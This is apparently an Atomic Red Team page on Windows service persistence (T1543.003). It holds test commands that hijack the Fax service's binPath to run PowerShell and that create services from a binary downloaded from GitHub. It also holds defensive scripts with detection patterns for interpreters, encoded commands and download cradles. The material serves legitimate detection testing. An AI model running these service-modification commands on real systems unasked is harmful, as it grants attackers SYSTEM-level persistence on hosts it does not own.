T1543.003 - Windows Service

Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).

Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.

An adversary may also incorporate Masquerading by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution.
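The description above makes the point that however a service is created or modified (sc.exe, New-Service, a direct Reg write, or a custom tool calling the Windows API), the result lands in the same place: the ImagePath and recovery-command values under HKLM\SYSTEM\CurrentControlSet\Services. The following PowerShell is an added example, not part of Atomic Red Team or ATT&CK, that audits those values at rest. The interpreter list, the "expected" binary directories and the argument patterns are assumptions made for this example, not an official detection rule; the sample command lines it runs over are constructed, and the first one is the binPath Atomic Test #1 writes into the Fax service.

```powershell
# Added example (not Atomic Red Team code): audit the registry-backed service configuration
# that sc.exe, New-Service and direct Reg edits all write to.
$ServicesKey  = 'HKLM:\SYSTEM\CurrentControlSet\Services'
# Script/host binaries that a persistent service rarely has a legitimate reason to run (assumption)
$Interpreters = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe',
                'mshta.exe', 'rundll32.exe', 'regsvr32.exe', 'msiexec.exe'
# Where a service binary is normally expected to live (assumption for this example)
$TrustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")

function Resolve-ServiceImage {
    # Pull the executable out of a service command line, e.g.
    #   "C:\Program Files\Vendor\svc.exe" /run
    #   %SystemRoot%\system32\svchost.exe -k netsvcs
    #   \SystemRoot\System32\drivers\sample.sys   (kernel drivers use NT-style paths)
    param([string]$CommandLine)
    $cl = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cl.StartsWith('"') -and $cl.IndexOf('"', 1) -gt 1) {
        $image = $cl.Substring(1, $cl.IndexOf('"', 1) - 1)
    } elseif ($cl -match '^(.+?\.(?:exe|sys|dll|cmd|bat))(?:\s|$)') {
        $image = $Matches[1]                       # unquoted path, possibly containing spaces
    } else {
        $image = ($cl -split '\s+')[0]
    }
    # Normalise \??\ and \SystemRoot\ prefixes and SystemRoot-relative driver paths
    $image = $image -replace '^\\\?\?\\', '' -replace '^\\SystemRoot\\', "$env:SystemRoot\"
    if ($image -notmatch '^[A-Za-z]:\\') { $image = Join-Path $env:SystemRoot $image }
    return $image
}

function Test-ServiceCommand {
    # Returns the reasons a service command line looks suspicious; an empty array means none.
    param([string]$CommandLine, [string]$Kind = 'ImagePath')
    $flags = @()
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return ,$flags }
    $image = Resolve-ServiceImage $CommandLine
    $leaf  = [IO.Path]::GetFileName($image).ToLowerInvariant()
    if ($Interpreters -contains $leaf) { $flags += "$Kind launches an interpreter ($leaf)" }
    $trusted = $TrustedRoots | Where-Object { $image.StartsWith($_, [StringComparison]::OrdinalIgnoreCase) }
    if (-not $trusted) { $flags += "$Kind is outside the expected directories: $image" }
    # Inline commands, encoded commands and download cradles handed to the interpreter
    if ($CommandLine -match '(?i)(-enc\w*\s|-e\s|-c\s|-command|frombase64string|downloadstring|\biex\b)') {
        $flags += "$Kind carries inline script or encoded arguments"
    }
    return ,$flags
}

function Get-SuspiciousServices {
    # Walk every service key (run elevated so all keys are readable), checking both the
    # binary (ImagePath) and the recovery command (FailureCommand, written by
    # "sc failure <name> command= ...") that the description above refers to.
    foreach ($key in Get-ChildItem $ServicesKey -ErrorAction SilentlyContinue) {
        $p = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
        $flags = @(Test-ServiceCommand $p.ImagePath 'ImagePath') +
                 @(Test-ServiceCommand $p.FailureCommand 'FailureCommand')
        if ($flags) {
            [pscustomobject]@{ Service = $key.PSChildName; Start = $p.Start; Flags = $flags -join '; ' }
        }
    }
}

# Constructed sample command lines (not taken from a real host) so the checks can be run
# without elevation. The first is the binPath Atomic Test #1 writes into the Fax service.
$Samples = @(
    @{ Service = 'Fax';         ImagePath = 'C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c "write-host ''T1543.003 Test''"' }
    @{ Service = 'AtomicSvc';   ImagePath = 'C:\Users\Public\AtomicService.exe' }
    @{ Service = 'Schedule';    ImagePath = '%SystemRoot%\system32\svchost.exe -k netsvcs' }
    @{ Service = 'VendorAgent'; ImagePath = '"C:\Program Files\Vendor Agent\agent.exe" /service' }
    @{ Service = 'sampledrv';   ImagePath = '\SystemRoot\System32\drivers\sample.sys' }
)
foreach ($s in $Samples) {
    $f = Test-ServiceCommand $s.ImagePath
    '{0,-12} {1}' -f $s.Service, $(if ($f) { $f -join '; ' } else { 'ok' })
}
# On a live host, run elevated:
# Get-SuspiciousServices | Format-Table -AutoSize
```

Of the constructed samples, Fax is flagged twice (interpreter plus inline `-c` argument) and AtomicSvc once (outside the expected directories); the svchost, quoted Program Files and driver entries pass. Reading ImagePath and FailureCommand from the registry rather than from `Get-Service` matters because the registry is what the Service Control Manager actually launches from, and it is what all of the tests on this page modify.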

Atomic Tests


Atomic Test #1 - Modify Fax service to run PowerShell

This test temporarily modifies the Fax service by pointing its binPath at PowerShell, starts the service, and then (in the cleanup step) restores the binPath. Upon successful execution, sc.exe rewrites the ImagePath of Fax so that the Service Control Manager launches powershell.exe instead of fxssvc.exe when the service is started; PowerShell then runs in session 0, so no window is visible. Because powershell.exe never reports back to the Service Control Manager as a service, `sc start Fax` returns error 1053 after roughly 30 seconds even though the process was launched. The Fax service must be present on the host for the test to run, and the cleanup writes a literal path, so if the service entry has to match its pre-test state exactly, record the original value with `sc qc Fax` before running the test.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
sc start Fax

Cleanup Commands:

sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1


Atomic Test #2 - Service Installation CMD

Installs a service from an executable on disk and starts it. If the binary is missing, the prerequisite step downloads AtomicService.exe from GitHub with PowerShell. Upon successful execution, cmd.exe spawns sc.exe, which creates the service and then starts it. Results are written to stdout.

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1543.003\bin\AtomicService.exe |
| service_name | Name of the Service | String | AtomicTestService_CMD |

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}

Cleanup Commands:

sc.exe stop #{service_name} >nul 2>&1
sc.exe delete #{service_name} >nul 2>&1

Dependencies: Run with powershell!

Description: Service binary must exist on disk at specified location (#{binary_path})
Check Prereq Commands:
if (Test-Path #{binary_path}) {exit 0} else {exit 1} 
Get Prereq Commands:
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"


Atomic Test #3 - Service Installation PowerShell

Installs a local service via PowerShell. If the binary is missing, the prerequisite step downloads AtomicService.exe from GitHub. Upon successful execution, PowerShell registers the service with New-Service and starts it with Start-Service. Results are displayed.

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1543.003\bin\AtomicService.exe |
| service_name | Name of the Service | String | AtomicTestService_PowerShell |

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"

Cleanup Commands:

Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()}
catch {}

Dependencies: Run with powershell!

Description: Service binary must exist on disk at specified location (#{binary_path})
Check Prereq Commands:
if (Test-Path #{binary_path}) {exit 0} else {exit 1} 
Get Prereq Commands:
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
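Tests #2 and #3 both register a new service, one through sc.exe and one through New-Service, and either way the Service Control Manager logs "A service was installed in the system" (System log, Event ID 7045) with the service name, image path, start type and account. The PowerShell below is an added example, not part of Atomic Red Team, that parses those events and flags installs worth a look. The flagging heuristics are assumptions for this example, and the sample event is constructed to look like what Test #2 leaves behind (host name, time and SID are made up), not a real capture.

```powershell
# Added example (not Atomic Red Team code): parse and triage Event ID 7045 service installs.
function ConvertFrom-ServiceInstallEvent {
    # Turn a 7045 event (XML as returned by EventLogRecord.ToXml()) into a flat object.
    param([string]$EventXml)
    $x = [xml]$EventXml
    $d = @{}
    foreach ($item in $x.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }
    [pscustomobject]@{
        Time         = $x.Event.System.TimeCreated.SystemTime
        Computer     = $x.Event.System.Computer
        InstallerSid = $x.Event.System.Security.UserID    # account that called CreateService
        ServiceName  = $d['ServiceName']
        ImagePath    = $d['ImagePath']
        StartType    = $d['StartType']
        Account      = $d['AccountName']
    }
}

function Test-ServiceInstall {
    # Heuristics (assumptions for this example) for a newly installed service; empty = nothing flagged.
    param($Install)
    $reasons = @()
    $path = [Environment]::ExpandEnvironmentVariables([string]$Install.ImagePath)
    if ($path -notmatch '^"?[A-Za-z]:\\(Windows|Program Files)') {
        $reasons += 'binary outside Windows/Program Files'
    }
    if ($Install.ServiceName -match '^AtomicTestService_' -or $path -match 'AtomicService\.exe') {
        $reasons += 'matches Atomic Red Team T1543.003 defaults'
    }
    # Most services run as LocalSystem, so only mention it when something else already looks off
    if ($reasons -and $Install.Account -eq 'LocalSystem') { $reasons += 'runs as LocalSystem' }
    return ,$reasons
}

function Get-RecentServiceInstalls {
    # Live query: every service installed in the last $Days days, with triage flags attached.
    param([int]$Days = 7)
    $filter = @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045;
                 StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $i = ConvertFrom-ServiceInstallEvent $_.ToXml()
        $i | Add-Member -NotePropertyName Flags -NotePropertyValue ((Test-ServiceInstall $i) -join '; ') -PassThru
    }
}

# Constructed 7045 event shaped like the one Test #2 produces (not a real capture).
$SampleXml = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Service Control Manager" />
    <EventID Qualifiers="16384">7045</EventID>
    <TimeCreated SystemTime="2024-05-01T10:15:00.000000000Z" />
    <Computer>WORKSTATION01</Computer>
    <Security UserID="S-1-5-21-1111111111-2222222222-3333333333-1001" />
  </System>
  <EventData>
    <Data Name="ServiceName">AtomicTestService_CMD</Data>
    <Data Name="ImagePath">C:\AtomicRedTeam\atomics\T1543.003\bin\AtomicService.exe</Data>
    <Data Name="ServiceType">user mode service</Data>
    <Data Name="StartType">demand start</Data>
    <Data Name="AccountName">LocalSystem</Data>
  </EventData>
</Event>
'@
$install = ConvertFrom-ServiceInstallEvent $SampleXml
$install | Format-List
'Flags: ' + ((Test-ServiceInstall $install) -join '; ')
# On a live host:
# Get-RecentServiceInstalls | Format-Table Time, ServiceName, ImagePath, Account, Flags -AutoSize
```

Two caveats when using this against the tests on this page. Test #1 does not produce a 7045 because it changes an existing service rather than installing one; that change shows up as a registry write to HKLM\SYSTEM\CurrentControlSet\Services\Fax\ImagePath (Sysmon Event ID 13, or Security Event ID 4657 if a SACL is set on the key) and, once the service is started, as services.exe spawning powershell.exe in process-creation telemetry (Sysmon Event ID 1 or Security Event ID 4688). And if "Audit Security System Extension" is enabled, service installs are additionally recorded in the Security log as Event ID 4697, which carries the installing user's account name rather than only a SID.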